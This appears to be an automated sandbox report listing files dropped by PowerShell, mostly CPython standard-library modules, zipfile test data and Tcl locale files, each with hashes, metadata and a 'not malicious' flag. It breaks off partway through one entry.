                                                                                                                                                                                                                      MD5:E92F248306CA018C14B1D6AC35DA1CBE
                                                                                                                                                                                                                      SHA1:0CD693391F102CBD8A540599E8B6867429AD59F3
                                                                                                                                                                                                                      SHA-256:7CBC982AE48A2C04FC4744EB1F1945E74430E227361FA949EA5740890AD58D05
                                                                                                                                                                                                                      SHA-512:2FC7AD197C29F7974047EA35019806A99491BCC0CB2FCBD2C0BF499B7C4DE21D80E6457606333339F51114A4859961261573B04B2A8DDCDAB382064FA7C2F89F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Convenience test module to run all of the XML-related tests in the..# standard library.....import sys..import test.support....test.support.verbose = 0....def runtest(name):.. __import__(name).. module = sys.modules[name].. if hasattr(module, "test_main"):.. module.test_main()....runtest("test.test_minidom")..runtest("test.test_pyexpat")..runtest("test.test_sax")..runtest("test.test_xml_dom_minicompat")..runtest("test.test_xml_etree")..runtest("test.test_xml_etree_c")..runtest("test.test_xmlrpc")..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):270
                                                                                                                                                                                                                      Entropy (8bit):4.319947185722896
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:5jZ9A8z3VFCBlZMJAMiPCDxxZC8z3VBjZOAMiReW1n:5jrzqzyJj5DxNzgjIeW1
                                                                                                                                                                                                                      MD5:49D252C0799A7224243ED37347473E94
                                                                                                                                                                                                                      SHA1:55673FE861F00E57A942833AA04E86F82EF46C35
                                                                                                                                                                                                                      SHA-256:E2CDB56FEBB5106607BF5F9B92B2B7A9516814E7650139CFE46F6B36BFCFA327
                                                                                                                                                                                                                      SHA-512:AE5AF09AA3A2CD1AD60A8A243563A692AB81B55C98C388DD9F694CFFC622547142164937498486D298E8B9B8E0C79FE6A49FE093D2100564716187CA1622AB13
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK.........i.=n.*.............filename_with_.o..txts.w....PK.........i.=n.*.............filename_without.txts.w....PK...........i.=n.*................... .......filename_with_.o..txtPK...........i.=n.*................... ...:...filename_without.txtPK..............s.....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):374
                                                                                                                                                                                                                      Entropy (8bit):3.597762581082904
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:59TKlb1PPA/X7h1FPA//4G3DXzyIrSl//7JTXG/a+9Kn7XG/n1CJ1NnDt8lOD:5BW1PoP7h1FoX4KeIrG/FTXGy+WXGP1A
                                                                                                                                                                                                                      MD5:CAFB05D8C8640330D6405FDE07E3A6C0
                                                                                                                                                                                                                      SHA1:E756D1ADB29A7637664A92A0D5600D6686942B9F
                                                                                                                                                                                                                      SHA-256:19CB87050B0FB410DA3B88DF752C2E1BDAEEC77AC052B04FEBEF31A68823CFCB
                                                                                                                                                                                                                      SHA-512:E752139D3C5A4F247C52DC78B44DD291A7AC9F90C05D6838F22729DCE3F880B521DB57F304C4DAEBDCC3BFCBE6FD12CE9A07FAAEF04874414CD5792F70EE980E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK..........%:................a/UT...}.bI..bIUx......PK..........%:................a/b/UT.....bI..bIUx......PK..........%:................a/b/cUT.....bI..bIUx......PK............%:.........................A....a/UT...}.bIUx..PK............%:.........................A5...a/b/UT.....bIUx..PK............%:..........................l...a/b/cUT.....bIUx..PK....................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                                                                      Entropy (8bit):4.8070860742226085
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:v0X1cEA6RKbL9dqNJX9TzQOpjFX3RY3PV7Xb7+:v0XaZ6RK3wX9TDpjFXe3PV7Xu
                                                                                                                                                                                                                      MD5:82388D19A0566CAD62B54E675CFC2FEE
                                                                                                                                                                                                                      SHA1:20EA9D2A77B9C5C8B5478195DFF7FEDE845762CC
                                                                                                                                                                                                                      SHA-256:319A65D47191C93B63CBBD40F9923572FA921475F0767C5BCB9DB4D61F3408D6
                                                                                                                                                                                                                      SHA-512:5100A5E730A1FCAE69FB6B22351DB40D6551FAFAABE75B760DA3BCB0CE8D97223485E354E23C97DBE09A233A4E973F398244702AEE4936AA1CD51050ECA4D2A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test data for `test_zipfile`....The test executables in this directory are created manually from header.sh and..the `testdata_module_inside_zip.py` file. You must have Info-ZIP's zip utility..installed (`apt install zip` on Debian).....## Purpose....These are used to test executable files with an appended zipfile, in a scenario..where the executable is _not_ a Python interpreter itself so our automatic..zipimport machinery (that'd look for `__main__.py`) is not being used.....## Updating the test executables....If you update header.sh or the testdata_module_inside_zip.py file, rerun the..commands below. These are expected to be rarely changed, if ever.....### Standard old format (2.0) zip file....```..zip -0 zip2.zip testdata_module_inside_zip.py..cat header.sh zip2.zip >exe_with_zip..rm zip2.zip..```....### Modern format (4.5) zip64 file....Redirecting from stdin forces Info-ZIP's zip tool to create a zip64.....```..zip -0 <testdata_module_inside_zip.py >zip64.zip..cat header.sh z
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Bourne-Again shell script executable (binary data)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                      Entropy (8bit):5.396098696254536
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:G56C3OEQz1M3uZtCgu5JMRARPmORzUuQtdNUbo/:go/eHG4JzrQt3go/
                                                                                                                                                                                                                      MD5:9110D1A26F495BB755076207BF420E2F
                                                                                                                                                                                                                      SHA1:57E320C688A27BC02C0F6FCF273759E419E2D00D
                                                                                                                                                                                                                      SHA-256:B1A8382ACACCE4022B02DAA25B293DDFC1DC6CE6A3DDB8B3D95B517592C5A428
                                                                                                                                                                                                                      SHA-512:930FD3D81991545D89965B790276B241A8551E71C8053610812DB484F167E9CAFCF704F730E6B430F7FF5F6984FBA8D1D4E2E330DA630A59C92BD175D7348B50
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/bash.INTERPRETER_UNDER_TEST="$1".if [[ ! -x "${INTERPRETER_UNDER_TEST}" ]]; then. echo "Interpreter must be the command line argument.". exit 4.fi.EXECUTABLE="$0" exec "${INTERPRETER_UNDER_TEST}" -E - <<END_OF_PYTHON.import os.import zipfile..namespace = {}..filename = os.environ['EXECUTABLE'].print(f'Opening {filename} as a zipfile.').with zipfile.ZipFile(filename, mode='r') as exe_zip:. for file_info in exe_zip.infolist():. data = exe_zip.read(file_info). exec(data, namespace, namespace). break # Only use the first file in the archive...print('Favorite number in executable:', namespace["FAVORITE_NUMBER"])..### Archive contents will be appended after this file. ###.END_OF_PYTHON.PK..-......\*OI_?S............-....E.......E.......# Test data file to be stored within a zip file..FAVORITE_NUMBER = 5.PK....-......\*OI_?SE...E.....................-PK..,.........-........................./.......x.......PK..................PK........../...x.....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Bourne-Again shell script executable (binary data)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                      Entropy (8bit):5.552962698595149
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:G56C3OEQz1M3uZtCgu5JMRARPmORzUu8elLQyHNUbB+:go/eHG4Jzr8elLQytgB+
                                                                                                                                                                                                                      MD5:AC5D1C58016623AB2FCA033D996CE822
                                                                                                                                                                                                                      SHA1:4BD2E368A95E520D006AB555487A00A92B4E016F
                                                                                                                                                                                                                      SHA-256:2F27F5C9108936A693FD496565E5C5050B5C62CFBB61D1D5DA9D97C89533D637
                                                                                                                                                                                                                      SHA-512:E2893DC06F5E68D95CBB83803DA25BA13F9D7A338237E074E695F1380DF9C36DF5E7815D1E3FCA51C8977981ADAD645380912E441BCBFFFB697B04A9C75A7AB1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/bash.INTERPRETER_UNDER_TEST="$1".if [[ ! -x "${INTERPRETER_UNDER_TEST}" ]]; then. echo "Interpreter must be the command line argument.". exit 4.fi.EXECUTABLE="$0" exec "${INTERPRETER_UNDER_TEST}" -E - <<END_OF_PYTHON.import os.import zipfile..namespace = {}..filename = os.environ['EXECUTABLE'].print(f'Opening {filename} as a zipfile.').with zipfile.ZipFile(filename, mode='r') as exe_zip:. for file_info in exe_zip.infolist():. data = exe_zip.read(file_info). exec(data, namespace, namespace). break # Only use the first file in the archive...print('Favorite number in executable:', namespace["FAVORITE_NUMBER"])..### Archive contents will be appended after this file. ###.END_OF_PYTHON.PK.........\*OI_?SE...E.......testdata_module_inside_zip.pyUT....{w]..w]ux.............# Test data file to be stored within a zip file..FAVORITE_NUMBER = 5.PK...........\*OI_?SE...E.....................testdata_module_inside_zip.pyUT....{w]ux.............PK..........c.........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Bourne-Again shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):737
                                                                                                                                                                                                                      Entropy (8bit):5.317609487834719
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:t56w2txs1xxa6FCKsYf3WTZ9bvkct+NRPCe/LD5Rb8MGCaALsTh9otlOBUuP:t56dU3zsYf3c3rZ2CQ35qMcA2fmOBUuP
                                                                                                                                                                                                                      MD5:2C7F22C22412B450ECA2316B9F9428B7
                                                                                                                                                                                                                      SHA1:B044C515C106048981963903C6BD7B856A903E3A
                                                                                                                                                                                                                      SHA-256:72E55879BADF789796C247750AE2F4AE756C37B215D8B892D7FFB696A7C95491
                                                                                                                                                                                                                      SHA-512:0854A52765A7B1132F8A3D4A6BFD0F15190C82FC4397DBD07E809969347514661ECA062BDBF5EA381C1CC3762BD54B1DE09EEF94312226F186C218132A8C2F4B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/bash..INTERPRETER_UNDER_TEST="$1"..if [[ ! -x "${INTERPRETER_UNDER_TEST}" ]]; then.. echo "Interpreter must be the command line argument.".. exit 4..fi..EXECUTABLE="$0" exec "${INTERPRETER_UNDER_TEST}" -E - <<END_OF_PYTHON..import os..import zipfile....namespace = {}....filename = os.environ['EXECUTABLE']..print(f'Opening {filename} as a zipfile.')..with zipfile.ZipFile(filename, mode='r') as exe_zip:.. for file_info in exe_zip.infolist():.. data = exe_zip.read(file_info).. exec(data, namespace, namespace).. break # Only use the first file in the archive.....print('Favorite number in executable:', namespace["FAVORITE_NUMBER"])....### Archive contents will be appended after this file. ###..END_OF_PYTHON..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                      Entropy (8bit):4.704629388038093
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SFCscAFdWKUohClyM59smCnWoN:SFaqNUoeyM5OmCWoN
                                                                                                                                                                                                                      MD5:22655D2EEBED68BA9C401ED7CC45F617
                                                                                                                                                                                                                      SHA1:9D558EF7C8C05197533C39C120E18BBEF4E8494D
                                                                                                                                                                                                                      SHA-256:F5FD528216ED76DDE2DE1B235A3CA6E31B84DF4DF6B9F0C0A5338161382F8951
                                                                                                                                                                                                                      SHA-512:96C18F88C69EAA33B80FC6E00E0419FA3F204B699670BCA524E82881773FD7A38617D75EFAFFE26531436DEB37F545E4FC4327FFCF4EE9FDABA69076063D0C92
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test data file to be stored within a zip file...FAVORITE_NUMBER = 5..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20209
                                                                                                                                                                                                                      Entropy (8bit):4.447873689358886
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:6jY1j/VIYzSu/AdorlSNMNt/KhV0q1uJN7J6CJap:6jY1j/bDAdWFOUNcC0p
                                                                                                                                                                                                                      MD5:66ED8AD42ECE95E40E68ED807E3A4053
                                                                                                                                                                                                                      SHA1:BD353F9EF3EA6D4CC510FC14F9A681F8F54C4CE6
                                                                                                                                                                                                                      SHA-256:CAD00069B2A25A585604D2FA774C288CF5ED70D4464AFAC16EDF821F3A4AFD5F
                                                                                                                                                                                                                      SHA-512:BBC4377CF3FC0B84694626D158CA969A2E4AB8B1C9A0CA778C6589362D804573A3B95031B30616D393F536D8CB13DBE1567ED084931A2619D83DD570107851AD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Text wrapping and filling..."""....# Copyright (C) 1999-2001 Gregory P. Ward...# Copyright (C) 2002, 2003 Python Software Foundation...# Written by Greg Ward <gward@python.net>....import re....__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent', 'indent', 'shorten']....# Hardcode the recognized whitespace characters to the US-ASCII..# whitespace characters. The main reason for doing this is that..# some Unicode spaces (like \u00a0) are non-breaking whitespaces..._whitespace = '\t\n\x0b\x0c\r '....class TextWrapper:.. """.. Object for wrapping/filling text. The public interface consists of.. the wrap() and fill() methods; the other methods are just there for.. subclasses to override in order to tweak the default behaviour... If you want to completely replace the main wrapping algorithm,.. you'll probably have to override _wrap_chunks()..... Several instance attributes control various aspects of wrapping:.. width (default: 70).. the maximum width of w
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13845
                                                                                                                                                                                                                      Entropy (8bit):4.376280470787703
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:cLWbxiKKgku/fXcsvHKut3THMXng+NZVJ:cacKKpu/0sfKGIXNZj
                                                                                                                                                                                                                      MD5:52D94135A6134821B35075F61972C692
                                                                                                                                                                                                                      SHA1:4F4D21C4AD0B07C5196FCA1E4F2CD8DF7BC0254D
                                                                                                                                                                                                                      SHA-256:892EE637AA0C91999882BE4A25984F5B33E8FC1C577CAB32ADE8F13B7DAE212D
                                                                                                                                                                                                                      SHA-512:646A6567B8B12616DFBC9D07BF2BAD84EB13A7E824B13979EAB1951FAE30526E7BF65B4F09DA9B898A131A1DB713E916A7D6BB9175326DF59FDC3F655FDFB908
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""Tool for measuring execution time of small code snippets.....This module avoids a number of common traps for measuring execution..times. See also Tim Peters' introduction to the Algorithms chapter in..the Python Cookbook, published by O'Reilly.....Library usage: see the Timer class.....Command line usage:.. python timeit.py [-n N] [-r N] [-s S] [-p] [-h] [--] [statement]....Options:.. -n/--number N: how many times to execute 'statement' (default: see below).. -r/--repeat N: how many times to repeat the timer (default 5).. -s/--setup S: statement to be executed once initially (default 'pass')... Execution time of this setup statement is NOT timed... -p/--process: use time.process_time() (default is time.perf_counter()).. -v/--verbose: print raw timing results; repeat for more digits precision.. -u/--unit: set the output time unit (nsec, usec, msec, or sec).. -h/--help: print this usage message and exit.. --: separate options from
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.904408530699153
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo0kGMo0F/W3v6ay/5o0kT+3vR6HyFvn:4EnLB383wG33v6ay/wK3voSVn
                                                                                                                                                                                                                      MD5:FEB4D50576BF3E11A0A40FD29ABE35A7
                                                                                                                                                                                                                      SHA1:8CEAA187C8AA5EC101743060A877D039850964CA
                                                                                                                                                                                                                      SHA-256:BA7FC0C0452D3E482DB6E19BDF512CACED639BA72B92ED8F66D80B52FEA11AC0
                                                                                                                                                                                                                      SHA-512:8B5D18E3D6628F369FB387C8EF08CC80000E0CBE500972958F4AD75F1C2F0DD6058F9777BD7DD0D7C26E7ECAA65E5071E2BF51B560973E88637942116C7576FB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y".. ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                      Entropy (8bit):4.457417703528286
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83XVhVTeMVHGPbfXSmWzaZlfFxUQbW1U6ZY95n123etvmv3eTn:43Xz0b/uzaZtXUMw8n
                                                                                                                                                                                                                      MD5:ACF0452D5BB6D36A40061D2B0AF4D7A6
                                                                                                                                                                                                                      SHA1:9DF4D88F1962A672EFBDDE524550F7A5D02D446D
                                                                                                                                                                                                                      SHA-256:778BE3D6BFE2DFFB64FF1AFB9EC8351A3343B314CF93A68E8F7FD1073EE122BB
                                                                                                                                                                                                                      SHA-512:34CC02D7D28B5E161ED10250C214375561FD3D00979BFB8BCF3DB72A81BD9B7C225301528B400F7C54D8B6379F772EB6477D5D03F2CF7DC4DD19D22AEEC151B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \.. "sun."\.. "m\u00e1n."\.. "\u00feri."\.. "mi\u00f0."\.. "fim."\.. "f\u00f6s."\.. "lau."].. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nudagur"\.. "\u00feri\u00f0judagur"\.. "mi\u00f0vikudagur"\.. "fimmtudagur"\.. "f\u00f6studagur"\.. "laugardagur"].. ::msgcat::mcset is MONTHS_ABBREV [list \.. "jan."\.. "feb."\.. "mar."\.. "apr."\.. "ma\u00ed"\.. "j\u00fan."\.. "j\u00fal."\.. "\u00e1g\u00fa."\.. "sep."\.. "okt."\.. "n\u00f3v."\.. "des."\.. ""].. ::msgcat::mcset is MONTHS_FULL [list \.. "jan\u00faar"\.. "febr\u00faar"\.. "mars"\.. "apr\u00edl"\.. "ma\u00ed"\.. "j\u00fan\u00ed"\.. "j\u00fal\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1294
                                                                                                                                                                                                                      Entropy (8bit):4.282101355195382
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83JYEVI2vfYpQjAOnhWBIIsmdC2lkOKk+Z+FoPJ6G3vesvY:43JZVB8eAOnh4IzR2+J6G/eKY
                                                                                                                                                                                                                      MD5:3354A6FC06C298E33AA14163929E56EB
                                                                                                                                                                                                                      SHA1:C3005370DAE8A266AE21F7E2B871AEA5A656A155
                                                                                                                                                                                                                      SHA-256:1D72170B9F9028A237364F7CD7EA8B48BD4770E61922205CE862300103B13DE5
                                                                                                                                                                                                                      SHA-512:58B64D4F5827CA2A1BF2DDFD1F7EFDDBBD46709A6A9B7277E8EB386D80043A87ADDE2B3D5A49A934E8EB8F797BD735FADA1D22AD3DD856FFE9507F71B9E45CBA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mer"\.. "gio"\.. "ven"\.. "sab"].. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \.. "domenica"\.. "luned\u00ec"\.. "marted\u00ec"\.. "mercoled\u00ec"\.. "gioved\u00ec"\.. "venerd\u00ec"\.. "sabato"].. ::msgcat::mcset it MONTHS_ABBREV [list \.. "gen"\.. "feb"\.. "mar"\.. "apr"\.. "mag"\.. "giu"\.. "lug"\.. "ago"\.. "set"\.. "ott"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset it MONTHS_FULL [list \.. "gennaio"\.. "febbraio"\.. "marzo"\.. "aprile"\.. "maggio"\.. "giugno"\.. "luglio"\.. "agosto"\.. "settembre"\.. "ottobre"\.. "novembre"\.. "dicembre"\.. "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):250
                                                                                                                                                                                                                      Entropy (8bit):4.8982877714191035
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoi5jL/oyJ+3v1oia+3vjLtAsvn:4EnLB383b3F+3vV3v3tnn
                                                                                                                                                                                                                      MD5:E4400C16406A46C2880250522BED2EDE
                                                                                                                                                                                                                      SHA1:787A04037A355FF845025B8865335EB938280BFB
                                                                                                                                                                                                                      SHA-256:24B5F303F5C7AF6F63FDC23ADB4D713087AE74B6D18C117D787AF03374C5F57E
                                                                                                                                                                                                                      SHA-512:3551DEEF0EAAC66042143F77F2F4DD9154764F35BD624DAB3C9F0F59F3489CA39CE34BC2A69BC5BFBB1926C6F5C39D74A806ECB1A47F6B374101071957FD417B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y".. ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                                                                      Entropy (8bit):4.951012555106795
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83Gl84OCtnbf3wvtMwvLv4GTwhvevTwSoXghGhD6h:43FULWttbdEVoES8gshD6h
                                                                                                                                                                                                                      MD5:11FBE427747012444AEEAFD6134034A4
                                                                                                                                                                                                                      SHA1:58C72C432053264EAE6335D6CC93C5FFA33C42B8
                                                                                                                                                                                                                      SHA-256:2B6D15A191437F1B84FA7023E34153B61E6BF1DE1452EA921E9CCBBE5D4BEB1C
                                                                                                                                                                                                                      SHA-512:4F993BDF5D50D6D9F7410C83D226FEF30BA8C989F9977A7025C36BE22CEECCD6C68CDD6AFC5C9CE3D700559C4EDC619042E14DD88EE7583B9D5AA66F0268FD23
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u6708"\.. "\u706b"\.. "\u6c34"\.. "\u6728"\.. "\u91d1"\.. "\u571f"].. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \.. "\u65e5\u66dc\u65e5"\.. "\u6708\u66dc\u65e5"\.. "\u706b\u66dc\u65e5"\.. "\u6c34\u66dc\u65e5"\.. "\u6728\u66dc\u65e5"\.. "\u91d1\u66dc\u65e5"\.. "\u571f\u66dc\u65e5"].. ::msgcat::mcset ja MONTHS_FULL [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"].. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d".. ::msgcat::mcset ja CE "\u897f\u66a6".. ::msgcat::mcset ja AM "\u5348\u524d".. ::msgcat::mcset ja PM "\u5348\u5f8c".. ::ms
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1025
                                                                                                                                                                                                                      Entropy (8bit):4.097746630492712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83E7XIE/OWbjH3Tw2PzJrIsmZ5maAXaMHPB:43WlrraA/vB
                                                                                                                                                                                                                      MD5:2F79804667D6F8C77BB188D59EF5F3DF
                                                                                                                                                                                                                      SHA1:10950ECA798F24A7C405B3E18B559CCC0C056EC1
                                                                                                                                                                                                                      SHA-256:96FF17F1CFF976E4E204D3616D1EFCED4D0F907C5E6A0F04B4536CB4AD1190C9
                                                                                                                                                                                                                      SHA-512:1B8ADC3B7FF920F8F53A17BFCC7EA24A0F8E276A42E5C63F9880DAE9B74E12716DD12DB647A80A9D99294449146C643EC58A33B03681AA4FA26A5FBC508C248C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \.. "sab"\.. "ata"\.. "mar"\.. "pin"\.. "sis"\.. "tal"\.. "arf"].. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \.. "sabaat"\.. "ataasinngorneq"\.. "marlunngorneq"\.. "pingasunngorneq"\.. "sisamanngorneq"\.. "tallimanngorneq"\.. "arfininngorneq"].. ::msgcat::mcset kl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset kl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "martsi"\.. "aprili"\.. "maji"\.. "juni"\.. "juli"\.. "augustusi"\.. "septemberi"\.. "oktoberi"\.. "novemberi"\.. "dece
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.882476709336307
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoEpb53FuoEpLE3vLjoEpLE3v6mjoEpba+3vnFDoAkvn:4EnLB383jF3Fyw3vxw3v6A/3v9dmn
                                                                                                                                                                                                                      MD5:255830678C8724E65C05A7E020E68B5B
                                                                                                                                                                                                                      SHA1:0AEA48AB0439C04F92B5CA9A3B5182718B7F116B
                                                                                                                                                                                                                      SHA-256:3027CFE9EBD2172CEFC15C025786CAD47A6E2894BF0474AFC1B0C341E70202AA
                                                                                                                                                                                                                      SHA-512:99039FFA7269DD136D1693121E261DB5586E86EC401D2B1EB8FB1D13A9A7F1E514D9FC941B838286B986C02ED281828ED67E59002D837E350A64F4832340516A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y".. ::msgcat::mcset kl_GL TIME_FORMAT "%T".. ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T".. ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1621
                                                                                                                                                                                                                      Entropy (8bit):4.612163420716489
                                                                                                                                                                                                                      Encrypted:false
